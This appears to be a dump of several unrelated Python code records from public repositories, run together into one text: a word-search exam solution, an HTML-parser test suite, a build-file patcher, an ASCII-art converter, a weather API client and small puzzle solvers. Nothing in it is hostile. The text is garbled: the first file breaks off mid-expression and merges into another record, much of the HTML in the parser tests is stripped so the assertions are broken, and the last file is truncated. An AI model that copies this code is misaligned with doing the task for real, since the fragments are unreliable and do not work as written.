19T3 - Rachid Hamadi\n# Sample Exam 2\n\n\n'''\nTries and find a word in a text file that represents a grid of words, all of the same length.\nThere is only one word per line in the file.\nThe letters that make up a word can possibly be separated by an arbitrary number of spaces,\nand there can also be spaces at the beginning or at the end of a word,\nand there can be lines consisting of nothing but spaces anywhere in the file.\nAssume that the file stores data as expected.\n\nA word can be read horizontally from left to right,\nor vertically from top to bottom,\nor diagonally from top left to bottom right\n(this is more limited than the lab exercise).\nThe locations are represented as a pair (line number, column number),\nstarting the numbering with 1 (not 0).\n'''\n\n\ndef find_word(filename, word):\n '''\n >>> find_word('word_search_1.txt', 'PLATINUM')\n PLATINUM was found horizontally (left to right) at position (10, 4)\n >>> find_word('word_search_1.txt', 'MANGANESE')\n 
MANGANESE was found horizontally (left to right) at position (11, 4)\n >>> find_word('word_search_1.txt', 'LITHIUM')\n LITHIUM was found vertically (top to bottom) at position (2, 14)\n >>> find_word('word_search_1.txt', 'SILVER')\n SILVER was found vertically (top to bottom) at position (2, 13)\n >>> find_word('word_search_1.txt', 'SODIUM')\n SODIUM was not found\n >>> find_word('word_search_1.txt', 'TITANIUM')\n TITANIUM was not found\n >>> find_word('word_search_2.txt', 'PAPAYA')\n PAPAYA was found diagonally (top left to bottom right) at position (1, 9)\n >>> find_word('word_search_2.txt', 'RASPBERRY')\n RASPBERRY was found vertically (top to bottom) at position (5, 14)\n >>> find_word('word_search_2.txt', 'BLUEBERRY')\n BLUEBERRY was found horizontally (left to right) at position (13, 5)\n >>> find_word('word_search_2.txt', 'LEMON')\n LEMON was not found\n '''\n with open(filename) as file:\n #grid = None\n # Insert your code here\n # A one liner that sets grid to the appropriate value is enough.\n grid = []\n i = 0\n for line in file:\n if line.split() == []:\n continue\n grid.append([])\n for e in line:\n if e.isalpha() == True:\n grid[i].append(e)\n i += 1\n #print(grid)\n location = find_word_horizontally(grid, word)\n found = False\n if location:\n found = True\n print(word, 'was found horizontally (left to right) at position', location)\n location = find_word_vertically(grid, word)\n if location:\n found = True\n print(word, 'was found vertically (top to bottom) at position', location)\n location = find_word_diagonally(grid, word)\n if location:\n found = True\n print(word, 'was found diagonally (top left to bottom right) at position', location)\n if not found:\n print(word, 'was not found')\n \n \ndef find_word_horizontally(grid, word):\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == word[0]:\n start_point = (i+1,j+1)\n k = 0\n while j+k>> [{id}] {test}')\n assert calc.sum(*numbers) == result\n","repo_name":"AlexandreBartie/python-pytest-example","sub_path":"test_calc.py","file_name":"test_calc.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38056262862","text":"from argparse import ArgumentParser\nimport codecs\nimport re\nimport functools\nimport os\nimport sys\n\n\ndef patch_file(filename):\n def decorator(fn):\n @functools.wraps(fn)\n def wrapper(self):\n if self.filename.endswith(filename):\n self.read()\n temp = self.content\n fn(self)\n if temp != self.content:\n print(f\"patched {self.filename}\")\n self.dirty = True\n\n wrapper._targetable = True\n return wrapper\n\n return decorator\n\n\nclass File(object):\n def __init__(self, filename):\n if not os.path.exists(filename):\n raise Exception(\n f\"The file at '{filename}' could not be found, did you supply an incorrect root directory?\"\n )\n self.filename = filename\n self.is_read = False\n self.dirty = False\n self.content = \"\"\n try:\n self.obj = open(self.filename, \"r+\")\n except:\n self.obj = []\n pass\n\n def patch(self):\n for key, value in self.__class__.__dict__.items():\n if getattr(value, \"_targetable\", False):\n getattr(self, key)()\n\n def __del__(self):\n if self.dirty:\n self.obj.write(self.content)\n self.obj.truncate()\n self.obj.close()\n\n def read(self):\n try:\n if not self.is_read:\n self.content = self.obj.read()\n self.obj.seek(0)\n self.is_read = True\n except:\n pass\n\n @patch_file(\"include/vulkan/vulkan.h\")\n def patch_vulkan(self):\n self.content 
= re.sub(\n            \"^#include <windows.h>$\",\n            r\"\"\"typedef unsigned long DWORD;\\n\"\"\"\n            r\"\"\"typedef const wchar_t* LPCWSTR;\\n\"\"\"\n            r\"\"\"typedef void* HANDLE;\\n\"\"\"\n            r\"\"\"typedef struct HINSTANCE__* HINSTANCE;\\n\"\"\"\n            r\"\"\"typedef struct HWND__* HWND;\\n\"\"\"\n            r\"\"\"typedef struct HMONITOR__* HMONITOR;\\n\"\"\"\n            r\"\"\"typedef struct _SECURITY_ATTRIBUTES SECURITY_ATTRIBUTES;\"\"\",\n            self.content,\n            flags=re.M,\n        )\n\n    @patch_file(\"core/core.vcxproj\")\n    def patch_msvc(self):\n        self.content = re.sub(\n            r\"<ObjectFileName>.*</ObjectFileName>\",\n            r\"<ObjectFileName>$(IntDir)%(Directory)</ObjectFileName>\",\n            self.content,\n        )\n\n\ndef patch(root):\n    patch_includes(root)\n    patch_msvc(root)\n\n\ndef patch_includes(root):\n    root = root.replace(\"\\\\\", \"/\") + \"/_deps/\"\n    files = []\n\n    for r, d, f in os.walk(root):\n        for file in f:\n            files.append(os.path.join(r, file))\n\n    for f in files:\n        fObj = File(f.replace(\"\\\\\", \"/\"))\n        fObj.patch()\n\n\ndef patch_msvc(root):\n    root = root.replace(\"\\\\\", \"/\")\n\n    if os.path.isfile(os.path.join(root, \"core/core.vcxproj\")):\n        fObj = File(os.path.join(root, \"core/core.vcxproj\"))\n    elif os.path.isfile(os.path.join(root, \"paradigm/core/core.vcxproj\")):\n        fObj = File(os.path.join(root, \"paradigm/core/core.vcxproj\"))\n    else:\n        raise Exception(\n            f\"No project files found at path '{root}', did you supply the correct path?\"\n        )\n    fObj.patch()\n\n\ndef patch_utf8(folders):\n    for folder in folders:\n        for r, d, f in os.walk(folder):\n            for file in f:\n                try:\n                    BUFSIZE = 4096\n                    BOMLEN = len(codecs.BOM_UTF8)\n\n                    with open(os.path.join(r, file), \"r+b\") as fp:\n                        chunk = fp.read(BUFSIZE)\n                        if chunk.startswith(codecs.BOM_UTF8):\n                            i = 0\n                            chunk = chunk[BOMLEN:]\n                            while chunk:\n                                fp.seek(i)\n                                fp.write(chunk)\n                                i += len(chunk)\n                                fp.seek(BOMLEN, os.SEEK_CUR)\n                                chunk = fp.read(BUFSIZE)\n                            fp.seek(-BOMLEN, os.SEEK_CUR)\n                            fp.truncate()\n                except:\n                    continue\n\n\nif __name__ == \"__main__\":\n    parser = ArgumentParser(description=\"Patch project files.\")\n    parser.add_argument(\n        \"--project\",\n        help=\"Override for the project files directory, this is relative to the root\",\n    )\n    parser.add_argument(\n        \"--utf8\",\n        nargs=\"+\",\n        help=\"Override for the project files directory, this is relative to the root\",\n    )\n    args = parser.parse_args()\n\n    if args.project:\n        patch(args.project)\n    if args.utf8:\n        patch_utf8(args.utf8)\n","repo_name":"JessyDL/paradigm","sub_path":"tools/patch.py","file_name":"patch.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"} {"seq_id":"70503078916","text":"#!/usr/bin/env python3\n\nimport unittest\nimport codecs\nimport os.path\nimport xml.etree.ElementTree as ET\nimport mechanize_mini\nimport warnings\n\nclass XmlEquivTest(unittest.TestCase):\n    def assertHtmlEqualsXml(self, html, xml, *, strict_whitespace=True):\n        htree = mechanize_mini.parsehtmlstr(html)\n        xtree = ET.fromstring(xml)\n\n        if not strict_whitespace:\n            # strip all texts in both trees\n            for el in 
xtree.iter():\n el.text = str(el.text or '').strip()\n el.tail = str(el.tail or '').strip()\n for el in htree.iter():\n el.text = str(el.text or '').strip()\n el.tail = str(el.tail or '').strip()\n\n self.assertEqual(htree.outer_xml,\n ET.tostring(xtree.getroot(), encoding='unicode'))\n\nclass BasicTest(XmlEquivTest):\n def test_empty(self):\n self.assertHtmlEqualsXml('', '')\n\n def test_vanilla(self):\n self.assertHtmlEqualsXml(\n '''\n \n \n Vanilla Example\n \n \n Hello, World!\n \n ''',\n '''\n \n Vanilla Example\n \n \n Hello, World!\n \n ''')\n\n def test_implicit_html(self):\n self.assertHtmlEqualsXml('Hello, World!', 'Hello, World!')\n self.assertHtmlEqualsXml('

Hello,

World!', '

Hello,

World!

')\n\n def test_unknown_tags(self):\n self.assertHtmlEqualsXml('bar', 'bar')\n self.assertHtmlEqualsXml('blublada', 'blublada')\n\n def test_html_attrib_collapse(self):\n self.assertHtmlEqualsXml('

blablub',\n '

blablub

')\n\n def test_single_special_chars(self):\n self.assertHtmlEqualsXml('a < dumbledore < blabla', 'a < dumbledore < blabla')\n self.assertHtmlEqualsXml('a&dum', 'a&dum')\n\n def test_attribute_without_val(self):\n self.assertHtmlEqualsXmlFragment('', '')\n\n def test_fragment(self):\n self.assertHtmlEqualsXmlFragment('

bla

', '

bla

')\n\n # multiple elements -> will be returned in wrapper\n self.assertHtmlEqualsXmlFragment('

bla

blub', '

bla

blub

')\n\n # text before or after -> wrapper will be returned\n self.assertHtmlEqualsXmlFragment('

bla

blub', '

bla

blub')\n self.assertHtmlEqualsXmlFragment('blub

bla', 'blub

bla

')\n\n def test_with_bom(self):\n self.assertHtmlEqualsXmlFragment('\\uFEFF

bla

', '

bla

')\n\n # but only one bom will be removed\n self.assertHtmlEqualsXmlFragment('\\uFEFF\\uFEFF

bla

', '\\uFEFF

bla

')\n\n def test_autoclose(self):\n # list items\n self.assertHtmlEqualsXmlFragment(\n '''\n
    \n
  • bla\n
  • blub\n
  • abcdefg\n
\n ''',\n '''\n
    \n
  • bla\n
  • blub\n
  • abcdefg\n
\n ''')\n\n # tables\n self.assertHtmlEqualsXmlFragment(\n '''\n \n \n \n \n \n \n \n \n \n
Howdy\n My friends!\n
Tables\n Can totally\n Be abused\n We don't care about geometry no way\n \n \n
\n
\n ''',\n '''\n \n \n \n \n \n \n \n \n \n
Howdy\n My friends!\n
Tables\n Can totally\n Be abused\n We don't care about geometry no way\n \\n \\n
\n
\n ''')\n\n # select items\n self.assertHtmlEqualsXmlFragment(\n '''\n \n ''',\n '''\n \n ''')\n\nclass ParagraphWeirdness(XmlEquivTest):\n def test_nested_paragraph(self):\n self.assertHtmlEqualsXml('

a

b

c

', '

a

b

c

')\n\n def test_paragraph_in_header(self):\n self.assertHtmlEqualsXml('

Bla

', '

Bla

')\n\n def test_rogue_closing_tags(self):\n self.assertHtmlEqualsXml(\n '''\n

\n Bla\n

\n Yumm

ie\n
\n Bla\n

\n ''',\n '''\n \n

\n Bla\n

\n
\n Yumm\n

\n ie\n

\n Bla\n

\n ''', strict_whitespace = False)\n self.assertHtmlEqualsXmlFragment(\n '''\n

\n
    \n
  • \n

    \n Some Paragraph\n

  • \n

    \n \n
\n \n \n ''',\n '''\n
\n
    \n
  • \n

    \n Some Paragraph\n

    \n
  • \n

    \n

\n
\n ''', strict_whitespace = False)\n self.assertHtmlEqualsXmlFragment(\n '''\n
\n
    \n
  • \n

    \n Some Paragraph\n

  • \n

    \n
\n
\n \n \n ''',\n '''\n
\n
    \n
  • \n

    \n Some Paragraph\n

    \n
  • \n

    \n

\n
\n ''', strict_whitespace = False)\n self.assertHtmlEqualsXml(\n '''\n \n \n
\n

\n Bla\n \n
\n
\n

\n

\n Blub\n \n \n ''', '''\n \n \n
\n

\n Bla\n \n
\n
\n

\n

\n Blub\\n \\n \\n ''')\n\n\n def test_sequence_methods(self):\n content = mechanize_mini.parsefragmentstr('
<ul><li>a</li><li>b</li><li>c</li></ul>')\n        self.assertEqual(content.outer_html, '<ul><li>a</li><li>b</li><li>c</li></ul>')\n\n        content[0] = mechanize_mini.parsefragmentstr('<li>d')\n        self.assertEqual(content.outer_html, '<ul><li>d</li><li>b</li><li>c</li></ul>')\n\n        del content[2]\n        self.assertEqual(content.outer_html, '<ul><li>d</li><li>b</li></ul>')\n\n    def test_repr(self):\n        content = mechanize_mini.parsefragmentstr('
    • a
    • b
    • c')\n\n self.assertEqual(repr(content), ''.format(id(content)))\n\nclass TestFormatMisnesting(XmlEquivTest):\n def test_correct(self):\n self.assertHtmlEqualsXml('a
      b
      c
      ', 'a
      b
      c
      ')\n\n def test_easy(self):\n self.assertHtmlEqualsXml('abc', 'abc')\n\n def test_stray_endtags(self):\n self.assertHtmlEqualsXmlFragment('

      blablub

      ', '

      blablub

      ')\n\n def test_evil1(self):\n self.assertHtmlEqualsXml('a
      bc
      de
      f
      ',\n 'a
      bc
      de
      f
      ')\n\n def test_evil2(self):\n self.assertHtmlEqualsXml('

      bla
      blublala
      ',\n '

      bla
      blublala
      ')\n\n def test_for_coverage(self):\n self.assertHtmlEqualsXmlFragment('
      bla
      ', '
      bla
      ')\n\nclass TestCharsetDetection(XmlEquivTest):\n def assertCodecEqual(self, a, b):\n self.assertEqual(codecs.lookup(a).name, codecs.lookup(b).name)\n\n def assertHtmlEqualsXml(self, html, xml, charset=None):\n htree = mechanize_mini.parsehtmlbytes(html, charset)\n xtree = ET.fromstring(xml)\n\n # prune empty text nodes from xml\n for el in xtree.iter():\n if str(el.text).strip() == '':\n el.text = None\n if str(el.tail).strip() == '':\n el.tail = None\n\n self.assertEqual(htree.outer_xml,\n ET.tostring(xtree, encoding='unicode'))\n\n def test_default(self):\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'cp1252')\n\n # yes, even if utf-8 characters are inside we still default to cp1252\n self.assertCodecEqual(mechanize_mini.detect_charset('blabläáßð«»'.encode('utf8')), 'cp1252')\n\n def test_xml_declaration(self):\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'utf8')\n\n # but meta tag overrides it\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'iso-8859-15')\n\n def test_bom(self):\n # various utf trickeries\n\n self.assertCodecEqual(mechanize_mini.detect_charset('\\uFEFFblöáðäü'.encode('utf-16-le')), 'utf-16-le')\n self.assertCodecEqual(mechanize_mini.detect_charset('\\uFEFFblöáðäü'.encode('utf-16-be')), 'utf-16-be')\n self.assertCodecEqual(mechanize_mini.detect_charset('\\uFEFFblöáðäü'.encode('utf8')), 'utf_8')\n\n # BOM overrides anything else\n self.assertCodecEqual(mechanize_mini.detect_charset(codecs.BOM_UTF8 + b''), 'utf_8')\n\n def test_meta(self):\n\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'cp1252')\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'utf-8')\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'cp1252')\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'utf-8')\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'utf-8')\n\n # multiple meta tags -> only first valid one is evaluated\n self.assertCodecEqual(mechanize_mini.detect_charset(b'blabla'), 'cp1252')\n self.assertCodecEqual(mechanize_mini.detect_charset(b'blabla'), 'utf-8')\n\n # meta content without charset -> cp1252\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'cp1252')\n\n # meta in ASCII test with UTF-16 -> gets turned into UTF-8\n self.assertCodecEqual(mechanize_mini.detect_charset(b'blabla'), 'utf-8')\n\n def test_garbage(self):\n # garbage charset -> default win1252\n\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'cp1252')\n\n self.assertCodecEqual(mechanize_mini.detect_charset(b'blabla', 'lutscher'), 'cp1252')\n\n def test_override(self):\n self.assertCodecEqual(mechanize_mini.detect_charset(b'bla', 'utf-8'), 'utf-8')\n self.assertCodecEqual(mechanize_mini.detect_charset(b'bla', 'ASCII'), 'cp1252')\n self.assertCodecEqual(mechanize_mini.detect_charset(b'bla', 'latin-1'), 'cp1252')\n\n def test_html(self):\n # standard case\n self.assertHtmlEqualsXml(b'

      bla', '

      bla

      ')\n\n # unicode characters interpreted as cp1252\n self.assertHtmlEqualsXml('a\\u2019b'.encode('utf-8'), 'a’b')\n\n # cp1252 characters misinterpreted as utf-8\n self.assertHtmlEqualsXml('aüb'.encode('cp1252'), 'a\\uFFFDb', charset='utf8')\n\nclass TestConvenience(unittest.TestCase):\n def test_text_content(self):\n content = mechanize_mini.parsefragmentstr('bla')\n self.assertEqual(content.text_content, 'bla')\n\n el = mechanize_mini.parsefragmentstr('

      bla


      blub \\nhola

      ')\n self.assertEqual(el.text_content, 'bla blub hola')\n\n def test_inner_html(self):\n el = mechanize_mini.HTML('

      Hello World

      ')\n self.assertEqual(el.inner_html, 'Hello World')\n\n el.inner_html = 'Goodbye World'\n self.assertEqual(el.text, 'Goodbye ')\n self.assertEqual(len(el), 1)\n self.assertEqual(el.outer_xml, '

      Goodbye World

      ')\n\nclass FindStuffTest(unittest.TestCase):\n def test_find_by_tag_name(self):\n test = mechanize_mini.parsefile(os.path.dirname(os.path.abspath(__file__)) + '/files/form.html')\n\n self.assertEqual(test.query_selector('form').tag, 'form')\n\n def test_find_by_class(self):\n test = mechanize_mini.parsefile(os.path.dirname(os.path.abspath(__file__)) + '/files/elements.html')\n\n # not existing\n self.assertEqual(test.query_selector('.nada'), None)\n\n # but there should be two of these\n self.assertEqual(len(list(test.query_selector_all('p.important'))), 2)\n\n def test_find_by_id(self):\n test = mechanize_mini.parsefile(os.path.dirname(os.path.abspath(__file__)) + '/files/elements.html')\n\n self.assertEqual(test.query_selector('#importantest').get('id'), 'importantest')\n\n def test_find_by_text(self):\n test = mechanize_mini.parsefile(os.path.dirname(os.path.abspath(__file__)) + '/files/elements.html')\n\n self.assertEqual(test.query_selector('.bar.baz.important').text_content, 'I am even more importanter')\n\n self.assertEqual(test.query_selector('p:contains(I am even more importanter)').get('class'), 'bar baz important')\n\nclass SelectorTest(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.f = mechanize_mini.HTML('''\n
<div class=\"outerdiv\" id=\"outerdiv\">\n                <div id=\"innerdiv\">\n                    <span class=\"a\">test</span>\n                </div>\n                <span class=\"a b\">test2</span>\n            </div>\n            <p id=\"barp\">\n                <span>bar</span>\n            </p>
      \n ''')\n\n\n def test_tags(self):\n spans = list(self.f.query_selector_all('span'))\n self.assertEqual(len(spans), 3)\n self.assertEqual([e.text for e in spans], ['test', 'test2', 'bar'])\n\n def test_descendant(self):\n indiv = list(self.f.query_selector_all('div span'))\n #self.assertEqual(len(indiv), 2)\n self.assertEqual([e.text for e in indiv], ['test', 'test2'])\n\n doubldiv = list(self.f.query_selector_all('div div span'))\n self.assertEqual(len(doubldiv), 1)\n self.assertEqual(doubldiv[0].text, 'test')\n\n nope = list(self.f.query_selector_all('html div'))\n self.assertEqual(len(nope), 0)\n\n def test_class_id(self):\n clazz = list(self.f.query_selector_all('.a'))\n self.assertEqual([e.text for e in clazz], ['test', 'test2'])\n\n clazz = list(self.f.query_selector_all('#outerdiv.outerdiv div#innerdiv span.a'))\n self.assertEqual([e.text for e in clazz], ['test'])\n\n multiclazz = list(self.f.query_selector_all('.a.b'))\n self.assertEqual([e.text for e in multiclazz], ['test2'])\n\n def test_child(self):\n immed = list(self.f.query_selector_all('.outerdiv >.a'))\n self.assertEqual([e.text for e in immed], ['test2'])\n\n def test_invalid(self):\n with self.assertRaises(mechanize_mini.InvalidSelectorError):\n list(self.f.query_selector_all('a:hover')) # not supported and will never be\n\n def test_universal_selector(self):\n sel = list(self.f.query_selector_all('* div'))\n self.assertEqual([e.id for e in sel], ['innerdiv'])\n\n sel = list(self.f.query_selector_all('* html')) # this is not IE6\n self.assertEqual(sel, [])\n\n def test_additional_whitespace(self):\n immed = list(self.f.query_selector_all(\".outerdiv> \\t .a \"))\n self.assertEqual([e.text for e in immed], ['test2'])\n\n def test_contains(self):\n self.assertEqual(self.f.query_selector(\"p:contains(\\\"bar\\\")\").id, 'barp')\n self.assertEqual(self.f.query_selector(\"span:contains(ba)\").text_content, 'bar')\n\n def test_empty(self):\n self.assertEqual(self.f.query_selector(''), None)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"genosse-einhorn/python-mechanize-mini","sub_path":"test/htmltree.py","file_name":"htmltree.py","file_ext":"py","file_size_in_byte":19429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3987369824","text":"import sys, argparse\nimport numpy as np\nimport math\nimport time \n\nfrom PIL import Image\n \n# gray scale level values from:\n# http://paulbourke.net/dataformats/asciiart/\n \n\ngscale1 = \"$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\\|()1{}[]?-_+~<>i!lI;:,\\\"^`'. \"\n \n\ngscale2 = '@%#*+=-:. 
'\n# gscale2 = \"@#S%?*+;:, \"\n \ndef getAverageL(image):\n    \n\n    im = np.array(image)\n    w,h = im.shape\n    \n\n    return np.average(im.reshape(w*h))\n \ndef convertImageToAscii(image, w, scale, moreLevels):\n\n    global gscale1, gscale2\n    \n\n    # image = Image.open(fileName).convert('L')\n    image = image.convert(\"L\")\n\n    W, H = image.size[0], image.size[1]\n    # print(\"input image dims: %d x %d\" % (W, H))\n    \n    cols = int(W/w)\n    h = w*scale\n    rows = int(H/h)\n    \n    # print(\"cols: %d, rows: %d\" % (cols, rows))\n\n    # print(\"tile dims: %d x %d\" % (w, h))\n    \n\n    if cols > W or rows > H:\n        print(\"Image too small for specified cols!\")\n        exit(0)\n    \n\n    aimg = []\n\n    for j in range(rows):\n        y1 = int(j*h)\n        y2 = int((j+1)*h)\n        \n        # correct last tile\n        if j == rows-1:\n            y2 = H\n        \n        aimg.append(\"\")\n        \n        for i in range(cols):\n\n            x1 = int(i*w)\n            x2 = int((i+1)*w)\n            \n            if i == cols-1:\n                x2 = W\n\n            lg1 = len(gscale1)-1\n            lg2 = len(gscale2)-1\n\n            img = image.crop((x1, y1, x2, y2))\n            \n            avg = int(getAverageL(img))\n            \n            if moreLevels:\n                gsval = gscale1[int((avg*lg1)/255)]\n            else:\n                gsval = gscale2[int((avg*lg2)/255)]\n            \n            aimg[j] += gsval\n    \n    return aimg\n    \n\ndef main():\n\n    descStr = \"This program converts an image into ASCII art.\"\n    parser = argparse.ArgumentParser(description=descStr)\n\n    parser.add_argument('--file', dest='imgFile', required=True)\n    parser.add_argument('--scale', dest='scale', required=False)\n    parser.add_argument('--out', dest='outFile', required=False)\n    parser.add_argument('--w', dest='w', required=False)\n    parser.add_argument('--morelevels',dest='moreLevels',action='store_true')\n    \n\n    args = parser.parse_args()\n    \n    imgFile = args.imgFile\n    \n\n    outFile = 'out.txt'\n    if args.outFile:\n        outFile = args.outFile\n    \n\n    # fall back to defaults so scale/w are always defined (default values are an assumed choice)\n    scale = 0.43\n    w = 10\n    if args.scale:\n        scale = float(args.scale)\n    \n    if args.w:\n        w = int(args.w)\n\n    t1 = time.time()\n\n    image = Image.open(imgFile)\n    \n    print('generating ASCII art...')\n    aimg = convertImageToAscii(image, w, scale, args.moreLevels)\n    \n    f = open(outFile, 'w')\n    \n    for row in aimg:\n        f.write(row + '\\n')\n    \n    f.close()\n    print(\"ASCII art written to %s\" % outFile)\n    t2 = time.time()\n    print(f\"Time to generate ascii: {t2 - t1}\")\n    \nif __name__ == '__main__':\n    main()","repo_name":"JKLeorio/asciiConventer","sub_path":"asciiImageConverter.py","file_name":"asciiImageConverter.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20654873448","text":"from django.shortcuts import render\n\n\ndef example_view(req):\n    # my_app/templates/my_app/example.html\n    return render(req, 'my_app/example.html')\n\n\ndef variable_view(req):\n    my_var = {\n        # string variable\n        'first_name': 'Rosalind',\n        'last_name': 'Franklin',\n        # list variable\n        'some_list': [1, 2, 3],\n        # dict variable\n        'some_dict': {\n            'inside_key': 'inside_value'\n        },\n        # bool\n        'user_logged_in': True\n    }\n    # context is the context object; its values can be read from inside the template file\n    return render(req, 'my_app/variable.html', context=my_var)\n","repo_name":"malred/i_site","sub_path":"my_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38073718145","text":"import sys\n\nin_put = sys.stdin.readline\n\n\ndef selfnum(n):\n    a=b=c=d=0\n    if n >= 1000:\n        a = n // 1000\n    if n >= 100:\n        b = (n//100 )%10\n    if n >= 10:\n        c = (n//10)%10\n    d= n%10\n\n    return n+a+b+c+d\n\n\n\nd=[]\nfor i in range(1,10000):\n    d.append(selfnum(i))\n\n\n\nfor i in range(1,10000):\n    
if not d.count(i):\n print(i)\n","repo_name":"machi107/Baekjoon-Codes","sub_path":"Silver 5/4673 셀프 넘버.py","file_name":"4673 셀프 넘버.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41796583995","text":"import urllib.request\nimport json\nfrom datetime import datetime, timedelta\n\n\nclass requester:\n \"\"\"\n This class is to request the timestamp and weather stock_info from the API\n and return it as a dictionary validating for date interval or sending\n yesterday information\n \"\"\"\n\n def __init__(self) -> None:\n \" Defining the url for the API\"\n self.__url = \"https://api.weather.gov/stations/KBFL/observations\"\n\n def get_weather_report(self, start: str, end: str) -> dict:\n \"Method that returns the information when start and end date is provided\"\n try:\n st = datetime.strptime(start, \"%Y-%m-%dT%H:%M:%SZ\")\n e = datetime.strptime(end, \"%Y-%m-%dT%H:%M:%SZ\")\n if e < st:\n return \"start date is greater than end date\"\n except ValueError:\n return 'Incorrect start or end data format, /n \\\n format should be \"%Y-%m-%dT%H:%M:%SZ\"'\n\n api_request = self.__url + '?start=' + start + '&end=' + end\n response = urllib.request.urlopen(api_request)\n data: bytes = response.read()\n station_info: dict = json.loads(data)\n result = self.__timestamp_temp(station_info)\n return result\n\n def yesterday_weather_report(self) -> dict:\n \"Method that returns the information for yesterday\"\n today = datetime.now().strftime(\"%Y-%m-%d\")\n today = datetime.strptime(today, \"%Y-%m-%d\")\n yesterday = today - timedelta(days=1)\n start = yesterday.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n end = today.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n api_request = self.__url + '?start=' + start + '&end=' + end\n response = urllib.request.urlopen(api_request)\n data: bytes = response.read()\n station_info: dict = json.loads(data)\n result = self.__timestamp_temp(station_info)\n return result\n\n def __timestamp_temp(self, station_info: dict) -> list:\n \"Method that returns a list with only timestamp and temperature \\\n receiving the station_info from the API converted to dict\"\n result = []\n for record in station_info['features']:\n result.append((record['properties']['timestamp'],\n record['properties']['temperature']['value']))\n return result[::-1]\n","repo_name":"lfbejarano/Sri-Challenge","sub_path":"API/data_request.py","file_name":"data_request.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23389454811","text":"#! 
/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\nimport logging\n#logging.basicConfig(level=logging.DEBUG)\n#interact = True\ninteract = False\n\nclass Solved(Exception):\n\tpass\ndef mowed(line, mowed_perpendicular_lines, L, P):\n\ttry:\n\t\tunmowed_fields = set(range(P))-set(mowed_perpendicular_lines)\n\t\tan_unmowed_field = list(unmowed_fields)[0]\n\t\tpossible_height = line[an_unmowed_field]\n\t\tlogging.debug((\"unmowed\", unmowed_fields, an_unmowed_field, mowed_perpendicular_lines))\n\texcept IndexError:\n\t\traise Solved\n\treturn all((line[i] == possible_height) or ((line[i] < possible_height) and i in mowed_perpendicular_lines) for i in range(P))\n\ndef solve_case(case):\n\tlogging.debug((\"solving\", case))\n\tN, M = case[0]\n\tgrid = case[1:]\n\tmowed_rows = []\n\tmowed_columns = []\n\ttry:\n\t\twhile True:\n\t\t\tfound_mowed = False\n\t\t\tfor line, index, mowed_lines, mowed_perpendicular_lines, L, P, debug in [(grid[i], i, mowed_rows, mowed_columns, N, M, \"rows\") for i in range(N)] + [([grid[j][i] for j in range(N)], i, mowed_columns, mowed_rows, M, N, \"columns\") for i in range(M)]:\n\t\t\t\tlogging.debug((\"checking\", debug, line, index, mowed_lines, mowed_perpendicular_lines))\n\t\t\t\tif index not in mowed_lines and mowed(line, mowed_perpendicular_lines, L, P):\n\t\t\t\t\tmowed_lines.append(index)\n\t\t\t\t\tfound_mowed = True\n\t\t\t\t\tlogging.debug(\"yes\")\n\t\t\tif len(mowed_rows) == N or len(mowed_columns) == M:\n\t\t\t\traise Solved\n\t\t\tif not found_mowed:\n\t\t\t\tlogging.debug(\"NO\")\n\t\t\t\treturn \"NO\"\n\texcept Solved:\n\t\tlogging.debug(\"YES\")\n\t\treturn \"YES\"\n\ndef case_line(case_number, cases):\n\t\"\"\"case_number != list index\"\"\"\n\tif interact:\n\t\tinput(case_number)\n\treturn \"Case #{}: {}\".format(case_number, solve_case(cases[case_number-1]))\n\ndef set_to_cases(set_):\n\treturn set_.split(\"\\n\")[1:-1]\n\ndef set_to_cases_blocks(set_):\n\treturn \"\\n\".join(set_to_cases(set_)).split(\"\\n\\n\")\n\ndef set_to_cases_blocks_numbered(set_):\n\tit = iter(set_to_cases(set_))\n\twhile True:\n\t\ttry:\n\t\t\tN, M = map(int, next(it).split(\" \"))\n\t\texcept StopIteration:\n\t\t\tbreak\n\t\telse:\n\t\t\tcase = [(N, M)]\n\t\t\tfor i in range(N):\n\t\t\t\tcase.append(next(it).split(\" \"))\n\t\t\tyield case\n\ndef solve_set(set_):\n\tcases = list(set_to_cases_blocks_numbered(set_))\n\treturn \"\\n\".join(case_line(i+1, cases) for i in range(len(cases)))\n\ntest_in = \"\"\"3\n3 3\n2 1 2\n1 1 1\n2 1 2\n5 5\n2 2 2 2 2\n2 1 1 1 2\n2 1 2 1 2\n2 1 1 1 2\n2 2 2 2 2\n1 3\n1 2 1\n3 1\n1\n2\n1\n\"\"\"\n\ntest_out = \"\"\"Case #1: YES\nCase #2: NO\nCase #3: YES\nCase #4: YES\"\"\"\n\ndef compare_test_case_line(case_number):\n\ttest_solution_line = case_line(case_number, 